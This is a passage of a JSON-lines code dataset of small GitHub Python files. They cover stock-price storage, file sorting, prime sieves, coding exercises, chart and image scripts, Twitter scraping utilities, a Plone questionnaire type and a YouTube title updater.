})\n\nCompanyPriceDataBase=CompanyPriceDataBase.to_frame().T\n#FundamentalmentalAnalysisDataBase=FundamentalmentalAnalysisDataBase.set_index(['Ticker'])\n\ntry:\n sqliteConnection = sqlite3.connect('../db/Fundamentals.db')\n cur = sqliteConnection.cursor()\n engine = create_engine('sqlite:///../db/Fundamentals.db', echo=False)\n conn = engine.raw_connection()\n cursor = conn.cursor()\n # print(\"Database created and Successfully Connected to SQLite\")\n\n try:\n CompanyPricesOld = pd.read_sql_table('CompanyPrices', engine)\n except:\n print('Empty CompanyPrices table')\n\n try:\n if stock_name in CompanyPricesOld['Ticker'].tolist():\n print(CompanyPricesOld['Ticker'])\n TickerToUpdateIndex = CompanyPricesOld['Ticker'].tolist().index(stock_name)\n CompanyPricesOld.loc[TickerToUpdateIndex] = CompanyPriceDataBase.loc[0]\n CompanyPricesOld.to_sql(\"CompanyPrices\", conn, if_exists='replace', index=False)\n else:\n CompanyPriceDataBase.to_sql(\"CompanyPrices\", conn, if_exists='append', index=False)\n except:\n CompanyPriceDataBase.to_sql(\"CompanyPrices\",conn, if_exists='append', index=False)\n \n \n\n record = cur.fetchall()\n cur.close()\n\nexcept sqlite3.Error as error:\n print(\"Error while connecting to sqlite\", error)\nfinally:\n if sqliteConnection:\n sqliteConnection.close()\n print(\"The SQLite connection is closed\")\n\n# Save (commit) the changes\nconn.commit()\n\n# Just be sure any changes have been committed or they will be lost.\nconn.close()\n","repo_name":"martinpcs21/stockcomparator","sub_path":"src/core/legacy/GetCompanyPrices.py","file_name":"GetCompanyPrices.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7514407713","text":"import os\r\nfrom pathlib import Path\r\n\r\nextensions = {\r\n \"DOCUMENTS\":[\".pdf\", \".docx\", \".txt\",\".exe\"],\r\n \"AUDIO\":[\".m4a\", \".m4b\", \".mp3\"], \r\n \"IMAGES\":[\".jpg\", \".jpeg\", \".png\"]\r\n}\r\n\r\ndef pickDir(value):\r\n for category, ekstensi in extensions.items():\r\n for suffix in ekstensi:\r\n if suffix == value:\r\n return category\r\n \r\n\r\ndef organize():\r\n for items in os.scandir():\r\n if items.is_dir():\r\n continue\r\n\r\n filePath = Path(items)\r\n fileType = filePath.suffix.lower()\r\n directory = pickDir(fileType)\r\n\r\n if directory == None:\r\n quit()\r\n\r\n directoryPath = Path(directory)\r\n if directoryPath.is_dir() != True:\r\n directoryPath.mkdir()\r\n filePath.rename(directoryPath.joinpath(filePath))\r\n\r\n\r\n\r\norganize()\r\n","repo_name":"brettsullivan98/FileAutomation","sub_path":"fileauto.py","file_name":"fileauto.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41261541957","text":"#!/usr/bin/python3\n\nnums = range(0, 100)\nd = 2\nwhile d <= 10:\n i = 0\n for x in nums:\n if x is not None and x % d == 0 and x != d:\n nums[i] = None\n i += 1\n d += 1\nprint(nums)\n","repo_name":"nonZero/demos-python","sub_path":"src/exercises/basic/primes/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43126432788","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/76501?language=python3\n\ndef soloution(absolutes, signs):\n # sings 가 참이면 해당 absoluted은 실제 정수가 양수, 거짓이면 음수 \n # 주어진 수에 하나씩 접근\n # 양수, 음수가 적용된 실제 합\n answer = 0\n for i in range(len(absolutes)):\n if signs[i]:\n answer += absolutes[i]\n else:\n answer -= absolutes[i]\n return answer ","repo_name":"nevertheless0404/Study_slowly","sub_path":"2022.08.21/음양더하기.py","file_name":"음양더하기.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18249619363","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\nImplémentations du crible d'Ératosthène\n\"\"\"\n\n\n__author__ = \"Sébastien CHAZALLET\"\n__copyright__ = \"Copyright 2012\"\n__credits__ = [\"Sébastien CHAZALLET\", \"InsPyration.org\", \"Éditions ENI\"]\n__license__ = \"GPL\"\n__version__ = \"1.0\"\n__maintainer__ = \"Sébastien CHAZALLET\"\n__email__ = \"pythoniste@protonmail.com\"\n__status__ = \"Production\"\n\n\nfrom itertools import cycle\nfrom array import array\nfrom time import time\nimport os\n\n\ndef infos() -> dict:\n \"\"\"Empreinte mémoire du processus courant\"\"\"\n\n with open('/proc/%d/status' % os.getpid()) as t:\n v = t.read()\n return dict(\n [\n [b.strip() for b in a.split(':')]\n for a in v.splitlines()\n ]\n )\n\n\ndef memory() -> tuple[str, str, str, str]:\n \"\"\"Renvoie des informations spécifiques parmi le dictionnaire d'information général\"\"\"\n i = infos()\n return i['VmSize'], i['VmStk'], i['VmData'], i['VmRSS']\n\n\ndef crible1(m: int) -> list:\n \"\"\"Algorithme classique pour le crible d'Ératosthène\"\"\"\n res, n = [i for i in range(2, m+1)], 2\n while n:\n for i in res[res.index(n)+1:]:\n if i % n == 0:\n res.remove(i)\n if res.index(n) + 1 < len(res):\n n = res[res.index(n) + 1]\n else:\n return res\n\n\ndef crible2(m: int) -> list:\n \"\"\"Algorithme pythonique pour le crible d'Ératosthène\"\"\"\n\n res = [i for i in range(m+1)]\n res[1], n = 0, 2\n while n**2 <= m:\n res[n*2::n], n = cycle([0]), n+1\n while not res[n]:\n n += 1\n return [i for i in res if i != 0]\n\n\ndef crible3(m: int) -> list:\n \"\"\"Algorithme alternatif\"\"\"\n\n found, numbers, i = [], [], 2\n while i <= m:\n if i not in numbers:\n found.append(i)\n for j in range(i, m+1, i):\n numbers.append(j)\n i += 1\n return found\n\n\ndef crible4(m: int) -> list:\n \"\"\"Algorithme alternatif\"\"\"\n\n if m < 2**31:\n t = 'i'\n else:\n if m >= 2**64:\n print('AVERTISSEMENT, le maximum a été limité à %s' % 2**64-1)\n t = 'L'\n l, n = array(t), 2\n l.extend([i for i in range(m+1)])\n while n**2 <= m:\n l[n*2::n], n = array(t, [0]*(m//n-1)), n+1\n while not l[n]:\n n += 1\n return [i for i in l if i != 0]\n\n\ndef test() -> dict[int, tuple[float, float, float, float]]:\n \"\"\"Mise en évidence des performances des deux algorithmes\"\"\"\n\n data = {}\n # memos = {}\n for m in [10, 100, 1000, 10000]:\n # m0=memory()\n t0 = time()\n crible1(m)\n t1 = time()\n # m1=memory()\n t2 = time()\n crible2(m)\n t3 = time()\n # m2=memory()\n t4 = time()\n crible3(m)\n t5 = time()\n # m3=memory()\n t6 = time()\n crible4(m)\n t7 = time()\n # m4=memory()\n data[m] = (t1-t0, t3-t2, t5-t4, t7-t6)\n # memos[m] = (m0, m1, m2, m3, m4)\n return data # , memos\n\n\nif __name__ == \"__main__\":\n sep = '+---------+-----------+------------+----------+------------+------------+'\n title = 'Crible'.center(len(sep)-2).center(len(sep), '|')\n head = '| maximum | classique | pythonique | gain (%) | alternatif | alternatif |'\n body = '| %7d | %9.7f | %9.7f | %8.2f | %9.7f | %9.7f |'\n memo = '| %7s | %9s | %9s | | %9s | %9s |'\n # datas, memos = test()\n datas = test()\n\n for s in [sep, title, sep, head]:\n print(s)\n\n keys = list(datas.keys())\n keys.sort()\n for k in keys:\n d = datas[k]\n d = (k,) + d[:2] + (100. * d[1] / d[0],) + d[2:]\n print(body % d)\n # for i, v in zip(('VmSize', 'VmStk', 'VmData', 'VmRSS'), memos[k]):\n # i=(i,)+v\n # print(memo % i)\n # print(sep)\n print(sep)\n","repo_name":"pythoniste/eni_codes","sub_path":"Types/eratosthene.py","file_name":"eratosthene.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33782023681","text":"import vtk\n\ncolors = vtk.vtkNamedColors()\n\ndicomImageReader = vtk.vtkDICOMImageReader()\n\nvolMap = vtk.vtkSmartVolumeMapper()\nvolMap.SetBlendModeToComposite()\nvolMap.SetRequestedRenderModeToGPU()\n\nvolProperty = vtk.vtkVolumeProperty()\nvolProperty.ShadeOn()\nvolProperty.SetInterpolationTypeToLinear()\nvolProperty.SetAmbient(0.4)\nvolProperty.SetDiffuse(1.0)\nvolProperty.SetSpecular(0.4)\n\ngradientOpacity = vtk.vtkPiecewiseFunction()\nscalarOpacity = vtk.vtkPiecewiseFunction()\ncolor = vtk.vtkColorTransferFunction()\n\nwinToImg = vtk.vtkWindowToImageFilter()\nwriter = vtk.vtkPNGWriter()","repo_name":"dobatruong1111/3dssr","sub_path":"settings/globalvars.py","file_name":"globalvars.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70445533173","text":"import pygal\r\nfrom utils import save_pygal, get_population_data\r\nfrom pygal.style import Style\r\n\r\n\r\ncustom_style = Style(\r\n background='transparent',\r\n label_font_size=16,\r\n legend_font_size=20,\r\n title_font_size= 25,\r\n major_label_font_size = 16,\r\n minor_label_font_size = 16,\r\n value_label_font_size = 16,\r\n tooltip_font_size=20)\r\n\r\n\r\n# Read the data and choose its subset\r\ndata = get_population_data(\"../data/clean_data.csv\")\r\n\r\nline_chart = pygal.Line(height=550, width=1200,\r\n truncate_label=False, x_label_rotation=90,\r\n value_formatter=lambda x: '{} mln'.format(x),\r\n style=custom_style,\r\n print_labels=True)\r\n\r\nline_chart.title = 'Population in Poland and its neighbors across the years'\r\nline_chart.x_title= 'Years'\r\nline_chart.y_title = 'Country population\\n[mln]'\r\nlabels = [str(i) for i in list(data[\"variable\"].unique())]\r\nline_chart.x_labels = labels\r\n\r\nfor country, data_for_country in data.groupby(\"Country Name\"):\r\n line_chart.add(country, [round(i/1000000, 2) for i in data_for_country.value.to_list()])\r\n\r\nsave_pygal(line_chart, \"pygal_plot1_data1\")\r\n","repo_name":"zofiakk/DAV","sub_path":"lab8/scripts/pygal_plot1_data1.py","file_name":"pygal_plot1_data1.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70535525174","text":"from PIL import Image\n\n\ndef mergeImagesHorizontally(images, coordinate):\n # create two lists - one for heights and one for widths\n widths, heights = zip(*(i.size for i in images))\n resultWidth = sum(widths)\n resultheight = min(heights) # take minimum height\n # create new image\n resultImage = Image.new('RGB', (resultWidth, resultheight))\n nextImagePosition = 0\n for im in images:\n resultImage.paste(im, (nextImagePosition, 0))\n nextImagePosition += im.size[0] # position for the next image\n resultImage.save('final'+str(coordinate)+'.jpg')\n\n\ndef mergeImagesVertically(images):\n # create two lists - one for heights and one for widths\n widths, heights = zip(*(i.size for i in images))\n resultWidth = min(widths) # take minimum width\n resultheight = sum(heights)\n # create new image\n resultImage = Image.new('RGB', (resultWidth, resultheight))\n nextImagePosition = 0\n for im in images:\n resultImage.paste(im, (0, nextImagePosition))\n nextImagePosition += im.size[1] # position for the next image\n resultImage.save('final-merged-map.jpg')\n\n\ndef main():\n \"\"\"This code works in two parts.\n\n The first part generates horizontal slices while the second part\n merges all the horizontal slices into the complete map.\n \"\"\"\n listOfRows = []\n for x in range(-10, 10):\n \"\"\"Here, we generate a list of lists, with each list element containing\n one row of filepaths of the 20x20 grid, making for a total of 20\n rows.\"\"\"\n imageRow = []\n for y in range(-10, 10):\n filepath = 'tile-'+str(y)+'_'+str(x)+'.jpg'\n imageRow.append(filepath)\n listOfRows.append(imageRow)\n\n listOfMergedRows = []\n\n for x in range(20):\n '''Here, we loop through the list of rows and horizontally\n merge each row, and generate a list of filepaths of\n horizontal strips for the next step.'''\n imgs = [Image.open(im) for im in listOfRows[x]]\n mergeImagesHorizontally(imgs, x)\n\n '''Since we traverse from -10 to 10, we reverse the filepath order\n for the final merge so as not to end up with a reversed merge'''\n listOfMergedRows.append('final'+str(19-x)+'.jpg')\n\n # Finally, we merge the horizontal strip into one complete image\n images = [Image.open(im) for im in listOfMergedRows]\n mergeImagesVertically(images)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"TheAntiSnipe/marauders-map","sub_path":"python-scripts/map-merge.py","file_name":"map-merge.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22186714294","text":"\"\"\"Temporary collection of utility functions.\nTODO:\n- determine better utility strategy to avoid import errors.\n- keywords should be extracted as constants.\n\"\"\"\nfrom datetime import date\nimport os\nimport re\nimport time\n\nimport json\nimport pandas as pd\nimport tweepy\n\n\ndef search_past_7_days(search_term, api, *, max_tweets=100, language=\"en\"):\n \"\"\"Returns specified number of tweets within the last 7 days.\n\n Parameters\n ----------\n search_term: :obj:`str`\n Search query.\n max_tweets: :obj:`int`\n Maximum number of tweets to be scraped. Default is 100.\n search_term: :obj:`str`\n Language of tweets.\n\n Returns\n -------\n :obj:`list`\n List of :obj:`tweepy.tweet` objects.\n\n \"\"\"\n\n # Handle pagination using the cursor object.\n cursor = tweepy.Cursor(\n api.search,\n q=search_term,\n language=language,\n include_entities=True,\n tweet_mode=\"extended\"\n ).items(max_tweets)\n\n # Gather the date, pausing 15 minutes any time the request limit is hit.\n tweet_data = []\n while True:\n try:\n tweet = cursor.next()\n tweet_data.append(tweet)\n except tweepy.TweepError:\n print(\"Entering except block, waiting...\")\n time.sleep(60 * 15)\n print(\"Continuing search...\")\n continue\n except StopIteration:\n # Entered when `max_tweets` reached.\n break\n\n return tweet_data\n\n\ndef create_tweet_data_dict_from_tweet_obj(tweet, tweet_attrs):\n \"\"\"Pulls relevant data from a `Tweet` object into a dictionary.\n\n tweet: tweepy.Tweet\n Tweepy `Tweet` object, returned from a search method.\n tweet_attrs: list\n List of attributes to be collected from `tweet`.\n\n \"\"\"\n single_tweet_dict = {}\n try:\n single_tweet_dict[\"text\"] = f\"RT @{tweet.retweeted_status.user._json['screen_name']}{tweet.retweeted_status.full_text}\" if tweet.full_text.startswith(\"RT @\") else tweet.full_text\n except AttributeError:\n single_tweet_dict[\"text\"] = tweet.full_text\n\n for attr in tweet_attrs:\n single_tweet_dict[attr] = getattr(tweet, attr)\n\n # Additional attrs accessed accessed through additional hierarchy.\n single_tweet_dict[\"created_at\"] = tweet.created_at.strftime(\"%d-%b-%Y %H:%M:%S\")\n single_tweet_dict[\"hashtags\"] = [entity[\"text\"] for entity in tweet.entities[\"hashtags\"]]\n single_tweet_dict[\"mentions\"] = [entity[\"screen_name\"] for entity in tweet.entities[\"user_mentions\"]]\n user_dictionary = tweet._json[\"user\"]\n single_tweet_dict[\"user_followers_count\"] = user_dictionary[\"followers_count\"]\n single_tweet_dict[\"user_screen_name\"] = user_dictionary[\"screen_name\"]\n single_tweet_dict[\"user_user_location\"] = user_dictionary[\"location\"]\n single_tweet_dict[\"search_method\"] = \"search_function\"\n single_tweet_dict[\"is_rt\"] = True if hasattr(tweet, \"retweeted_status\") else False\n\n return single_tweet_dict\n\n\ndef create_tweet_data_dict_from_status_obj(status, tweet_attrs):\n \"\"\"Pulls relevant data from a `Status` object into a dictionary.\n\n tweet: tweepy.Status\n Tweepy `Status` object, returned from a search method.\n tweet_attrs: list\n List of data to be collected from `Status`.\n\n \"\"\"\n single_tweet_dict = {}\n try:\n key = 'retweeted_status'\n original_text = status._json[\"full_text\"]\n rt_text = status._json[key][\"full_text\"]\n user_screen_name = status._json[key]['user']['screen_name']\n single_tweet_dict[\"text\"] = f\"RT @{user_screen_name}{rt_text}\" if original_text.startswith(\"RT @\") else original_text\n is_rt = True\n except KeyError:\n single_tweet_dict[\"text\"] = status._json[\"full_text\"]\n is_rt = False\n\n for attr in tweet_attrs:\n single_tweet_dict[attr] = status._json[attr]\n\n # Additional key-values accessed accessed through additional hierarchy.\n single_tweet_dict[\"created_at\"] = status._json[\"created_at\"]\n single_tweet_dict[\"hashtags\"] = [entity[\"text\"] for entity in status._json[\"entities\"][\"hashtags\"]]\n single_tweet_dict[\"mentions\"] = [entity[\"screen_name\"] for entity in status._json[\"entities\"][\"user_mentions\"]]\n user_dictionary = status._json[\"user\"]\n single_tweet_dict[\"user_followers_count\"] = user_dictionary[\"followers_count\"]\n single_tweet_dict[\"user_screen_name\"] = user_dictionary[\"screen_name\"]\n single_tweet_dict[\"user_user_location\"] = user_dictionary[\"location\"]\n single_tweet_dict[\"search_method\"] = \"user_timeline\"\n single_tweet_dict[\"is_rt\"] = is_rt\n\n return single_tweet_dict\n\n\ndef save_tweets_as_json(tweet_list, *, filename, search_term, search_method=\"search\"):\n \"\"\"Extracts data from tweets and saves as JSON file.\n\n Parameters\n ----------\n tweet_list: list\n List of `Tweet` objects when `search` function is used. List of `Status`\n objects when `user_timeline` function is used.\n filename: str\n Name of JSON file to be saved, including relative path from working\n directory to target destination. JSON file extension (.json) will be\n appended automatically if not included in this argument.\n search_term: str\n Query term used to extract the tweets in `tweet_list`.\n search_method: str\n Default is \"search\". Must be a valid type of tweepy search. Search and\n user timeline queries currently supported.\n\n Notes\n -----\n This function handles saves from two types of searches. A tweepy search\n returns a list of `Tweet` objects, whereas a tweepy user timeline search\n returns a list of `Status` objects. These objects have different attributes,\n warranting different functions to collect the same data.\n\n The `reply count` attribute is only available with premium accounts.\n\n \"\"\"\n SEARCH_KEYWORD = \"search\"\n USER_TIMELINE_KEYWORD = \"user_timeline\"\n search_methods = (SEARCH_KEYWORD, USER_TIMELINE_KEYWORD)\n if search_method.lower() not in search_methods:\n q = f\"search_method must take one of the following values : {search_methods}\"\n raise ValueError(q)\n\n data_dict, metadata, tweets = {}, {}, []\n\n search_date_str = date.today().strftime(\"%d-%b-%Y\")\n\n tweet_attrs = [\"id\", \"retweet_count\", \"favorite_count\",\n \"in_reply_to_status_id\", \"in_reply_to_screen_name\",\n \"in_reply_to_user_id\", \"source\", \"lang\", \"geo\",\n \"coordinates\"]\n\n if search_method == SEARCH_KEYWORD:\n for tweet in tweet_list:\n tweets.append(create_tweet_data_dict_from_tweet_obj(tweet, tweet_attrs))\n num_tweets = len(tweet_list)\n elif search_method == USER_TIMELINE_KEYWORD:\n num_tweets = 0\n for tweet in tweet_list:\n tweets.append(create_tweet_data_dict_from_status_obj(tweet, tweet_attrs))\n num_tweets += 1 # As length of iterator unknown.\n\n metadata[\"date_collected\"] = search_date_str\n metadata[\"search_term\"] = f\"User timeline: @{search_term}\" if search_method == SEARCH_KEYWORD else f\"search: {search_term}\"\n metadata[\"num_tweets\"] = num_tweets\n\n data_dict[\"metadata\"] = metadata\n data_dict[\"tweets\"] = tweets\n\n root, ext = os.path.splitext(f\"../data/{filename}\")\n if ext != \".json\":\n print(f\"The extension {ext} is invalid. Replacing with '.json'\")\n ext = \".json\"\n filename = f\"{root}-{search_date_str}{ext}\"\n\n with open(filename, \"w\") as json_file:\n json.dump(data_dict, json_file)\n\n return\n\n\ndef open_json(filename):\n \"\"\"Opens JSON file a dictionary.\n\n Parameters\n ----------\n filename :obj:`str`\n Name of JSON file being loaded.\n\n Returns\n -------\n :obj:`dict`\n Dictionary containing JSON data.\n\n \"\"\"\n with open(filename) as json_file:\n data_dict = json.load(json_file)\n return data_dict\n\n\ndef open_json_as_dataframe(filename):\n \"\"\"Converts JSON data to pandas dataframe.\n\n Parameters\n ----------\n filename : str\n Name of JSON file being loaded.\n\n Returns\n -------\n pd.DataFrame\n Pandas dataframe with information on tweets.\n dict\n Dictionary containing query metadata.\n\n \"\"\"\n data_dict = open_json(filename)\n metadata_dict = data_dict[\"metadata\"]\n df = pd.DataFrame(data_dict[\"tweets\"])\n df.index.name = \"tweet_id\"\n return df, metadata_dict\n\n\ndef de_emojify(text):\n \"\"\"Removes emojis from a string.\n\n Parameters\n ----------\n text : str\n String to remove emojis from.\n\n Returns\n -------\n text : str\n String with any emojis removed.\n\n Notes\n -----\n See https://stackoverflow.com/questions/33404752/\n removing-emojis-from-a-string-in-python\n\n \"\"\"\n regrex_pattern = re.compile(\n pattern=\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n \"]+\", flags=re.UNICODE)\n return regrex_pattern.sub(r'', text)\n\n\ndef clean(docs):\n \"\"\"Removes emails, new lines, single quotation marks and urls, emojis.\n\n Parameters\n ----------\n doc_list\n List of documents to be cleaned.\n Returns\n -------\n list\n List of cleaned documents.\n\n \"\"\"\n docs_clean = [re.sub('\\S*@\\S*\\s?', '', sent) for sent in docs]\n docs_clean = [re.sub('\\s+', ' ', sent) for sent in docs_clean]\n docs_clean = [re.sub(\"\\'\", \"\", sent) for sent in docs_clean]\n docs_clean = [re.sub(\"([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \"\", sent) for sent in docs_clean]\n docs_clean = [de_emojify(sent) for sent in docs_clean]\n return docs_clean\n","repo_name":"jackirvine97/twitter_analysis","sub_path":"examples/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19055755954","text":"# https://www.hackerrank.com/challenges/np-arrays/problem\nimport numpy\n\n\ndef arrays(array):\n array = numpy.array(array, dtype=float)\n array = numpy.flip(array)\n return array\n\n\narr = input().strip().split(' ')\nresult = arrays(arr)\nprint(result)\n","repo_name":"RitamChakraborty/HackerRank_Python","sub_path":"Numpy/Arrays/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"16967355537","text":"\n# 어떤 양의 정수 X의 각 자리가 등차수열을 이룬다면, 그 수를 한수라고 한다. \n# 등차수열은 연속된 두 개의 수의 차이가 일정한 수열을 말한다. \n# 즉,10은 1과 0으로 이루어짐 1-0=1 차이가 1인 등차수열\n# 200은 2 0 0 2-0=2 0-0=0 2!=0 즉, 등차 수열이 아니다\n# 로직은 간단하다 1의자리 숫자는 숫자 하나이므로 전부 다 등차수열\n# 10의 자리 수들도 각 자리가 숫자 두개이므로 전부 다 등차수열\n# 100 미만은 등차수열이다.\n# 100 이상의 경우 문자열로 바꿔준 다음 인덱스로 접근해서 각 자리 숫자의 차가 같은지를 비교하면 될 듯\n# N이 주어졌을 때, 1보다 크거나 같고, N보다 작거나 같은 한수의 개수를 출력하는 프로그램을 작성하시오. \n\nX = int(input())\n\ncnt = 0\nfor i in range(1, X+1):\n if i < 100:\n cnt += 1\n else:\n i = list(map(int, str(i))) # str[i]를 순환하면서 int로 변환하고 그걸 list에 담는다\n if i[0] - i[1] == i[1] - i[2]:\n cnt += 1\nprint(cnt)\n ","repo_name":"wdahlia/Python-Algorithm","sub_path":"KDT 실습/0725 BOJ/1065_한수.py","file_name":"1065_한수.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"74002519093","text":"# -*- coding: utf-8 -*-\nfrom plone.app.textfield import RichText\nfrom plone.autoform import directives\nfrom plone.dexterity.content import Item\nfrom plone.supermodel import model\nfrom plone.supermodel.directives import fieldset\nfrom z3c.form.browser.radio import RadioFieldWidget\nfrom plone import api as ploneapi\nfrom z3c.relationfield.schema import RelationChoice, RelationList\nfrom zope.interface import provider\nfrom plone.autoform import directives as form\nfrom zope.schema.interfaces import IContextSourceBinder\nfrom zope.schema.vocabulary import SimpleVocabulary, SimpleTerm\nfrom collective.z3cform.datagridfield import DataGridFieldFactory\nfrom collective.z3cform.datagridfield import DictRow\nfrom plone.app.vocabularies.catalog import CatalogSource\nfrom z3c.form.interfaces import NOVALUE\nfrom zope import schema\nfrom zope.interface import implementer\nfrom zope.component import getUtility\nfrom plone.i18n.normalizer.interfaces import IIDNormalizer\nfrom zope.interface import implementer\nfrom zope.globalrequest import getRequest\n\ndictdefault={'ja':u'', 'unbekannt':u'', 'nein':u''}\n\nlistdefault=[\n {u'antwort':u'ja', u'aktion':None, u'color':u'#51AE31', u'rates':u'ok'},\n {u'antwort':u'unbekannt', u'aktion':None, u'color':u'#F39200', u'rates':u'klaerung'},\n {u'antwort':u'nein', u'aktion':None, u'color':u'#D40F14', u'rates':u'handlung'},\n ]\n\n@provider(IContextSourceBinder)\ndef possibleQuestionsOrPages(context):\n #request = getRequest()\n #context = request.PARENTS[0]\n #context = context.aq_parent\n brains = ploneapi.content.find(portal_type=[u'Hinweistext', u'Frage'])\n terms = []\n if brains:\n for i in brains:\n obj = i.getObject()\n fragebogen = obj.fbid\n vocabtitle = \"%s-%s (%s)\" %(fragebogen, i.Title, i.portal_type)\n terms.append(SimpleVocabulary.createTerm(i.UID, i.UID, vocabtitle))\n terms.sort(key=lambda x: x.title)\n return SimpleVocabulary(terms) \n\n\n\n@provider(IContextSourceBinder)\ndef possibleThemen(context):\n terms = []\n normalizer = getUtility(IIDNormalizer)\n themenbereiche = context.themenbereiche\n if themenbereiche:\n for i in themenbereiche:\n mytoken = normalizer.normalize(i)\n terms.append(SimpleVocabulary.createTerm(i,mytoken,i))\n return SimpleVocabulary(terms)\n\ncolorterms = [\n SimpleTerm(u'#555555', u'secondary', u'siguv-grau'),\n SimpleTerm(u'#004994', u'primary', u'siguv-blau'),\n SimpleTerm(u'#0095DB', u'info', u'siguv-cyan'),\n SimpleTerm(u'#51AE31', u'success', u'siguv-grün'),\n SimpleTerm(u'#F39200', u'warning', u'siguv-orange'),\n SimpleTerm(u'#D40F14', u'danger', u'siguv-rot'),\n SimpleTerm(u'#B80D78', u'dark', u'siguv-violett'),\n SimpleTerm(u'#FFCC00', u'light', u'siguv-gelb'),\n ]\nSiguvColors = SimpleVocabulary(colorterms)\n\nrating = [\n SimpleTerm(u'keine', u'keine', u'keine Bewertung'),\n SimpleTerm(u'ok', u'ok', u'OK'),\n SimpleTerm(u'klaerung', u'klaerung', u'Klärungsbedarf'),\n SimpleTerm(u'handlung', u'handlung', u'Handlungsbedarf'),\n ]\nRatingValues = SimpleVocabulary(rating)\n\n\nclass IAnswerOptions(model.Schema):\n antwort = schema.TextLine(title=u\"Antwortoption\")\n\n aktion = schema.Choice(title=u\"Aktion\",\n source=possibleQuestionsOrPages,\n required=False)\n\n color = schema.Choice(title=u\"Farbe\",\n source=SiguvColors,\n required=False)\n\n rates = schema.Choice(title=u\"Bewertung\",\n source=RatingValues,\n default=u'keine',\n required=False)\n\nclass IFrage(model.Schema):\n \"\"\" Marker interface and Dexterity Python Schema for Frage\n \"\"\"\n\n fbid = schema.TextLine(title=u\"Kürzel oder Nummer des Fragebogens\")\n\n frage = RichText(title=u\"Fragestellung\",\n description=u\"Bitte bearbeiten Sie hier die Frage für die Checkliste\")\n\n thema = schema.Choice(title=u\"Auswahl des Themas für die Frage\",\n source=possibleThemen,\n required=False)\n\n form.widget('optionen', DataGridFieldFactory)\n optionen = schema.List(title=u\"Antwortoptionen\",\n required=True,\n value_type=DictRow(title=u\"Optionen\", schema=IAnswerOptions),\n default=listdefault)\n\n tipp = RichText(title=u\"Hinweis zur Fragestellung\",\n description=u\"Bitte bearbeiten Sie hier einen Hinweis zur Frage\",\n required=False)\n\n\n@implementer(IFrage)\nclass Frage(Item):\n \"\"\"\n \"\"\"\n","repo_name":"kraeks/edi.checkapp","sub_path":"src/edi/checkapp/content/frage.py","file_name":"frage.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42229220861","text":"import os\r\n\r\nimport google_auth_oauthlib.flow\r\nimport googleapiclient.discovery\r\nimport googleapiclient.errors\r\n\r\nscopes = [\"https://www.googleapis.com/auth/youtube.force-ssl\"]\r\n\r\n# Disable OAuthlib's HTTPS verification when running locally.\r\n# *DO NOT* leave this option enabled in production.\r\nos.environ[\"OAUTHLIB_INSECURE_TRANSPORT\"] = \"1\"\r\n\r\napi_service_name = \"youtube\"\r\napi_version = \"v3\"\r\nclient_secrets_file = \"C:/secret-file.json\"\r\n\r\n# Get credentials and create an API client\r\nflow = google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file(\r\n client_secrets_file, scopes)\r\ncredentials = flow.run_console()\r\nyoutube = googleapiclient.discovery.build(\r\n api_service_name, api_version, credentials=credentials)\r\n\r\n# Get the initial response\r\ninitial_request = youtube.videos().list(\r\n part=\"statistics\",\r\n id=\"5lUXhaVbyRs\"\r\n )\r\ninitial_response = initial_request.execute()\r\n\r\n# Parse view count from the update response\r\nprint(initial_response)\r\nview_count_dict = initial_response[\"items\"][0][\"statistics\"]\r\nview_count = view_count_dict[\"viewCount\"]\r\n\r\nupdate_request = youtube.videos().update(\r\n part=\"snippet\",\r\n body={\r\n \"id\": \"5lUXhaVbyRs\",\r\n \"snippet\": {\r\n \"title\": \"This video have \" + view_count + \" views\",\r\n \"categoryId\": \"27\",\r\n \"channelId\": \"UCPfgEZOccr6tPVvMeKOJ-Dw\"\r\n },\r\n }\r\n)\r\nupdate_request.execute()\r\n\r\n\r\nprint(\"Title successfuly changed to: This video have\", view_count, \"views\")","repo_name":"Jinan47/Youtube-Video-Title-Updater","sub_path":"video_title_updater.py","file_name":"video_title_updater.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4450753262","text":"from tboneDeepRacerUtils import calcDistanceFromCenter, getClosestWaypoints, 